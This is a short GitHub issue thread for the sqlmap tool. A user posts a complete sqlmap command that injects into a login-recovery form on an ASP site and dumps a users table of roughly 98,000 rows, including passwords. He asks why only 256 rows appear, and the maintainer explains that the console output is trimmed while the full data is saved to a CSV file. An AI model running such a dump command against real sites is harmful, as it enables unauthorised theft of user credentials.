### ISSUE TITLE
The load is stopped

### ISSUE THREAD

**Issue by t00rhack3r** [sqlmapproject/sqlmap#2488]
I am using sqlmap to download data.

Are 98000 records

`python sqlmap.py --threads=10 --random-agent -u http://www.url.com/db/recordar_pass.asp --data="user=-'1" --tamper=space2mssqlblank -D DBNAME -T users -C "deposits,email,id,username,username,password,winnings" --start=1 --stop=98324 --code=500 --time-sec=10 --timeout=100`

I have this error:
```
[13:36:37] [WARNING] console output will be trimmed to last 256 rows due to large table size

```
After the 256 lines do not download more

Then do not download more... :(

How can i solve it... 

How can I download the whole table without problem?

**Comment by stamparm** [comment]
Basically, sqlmap says that it will trim the console output to only last 256 rows. Hence, you should find your data in the output directory (...csv file). Check the rest of messages
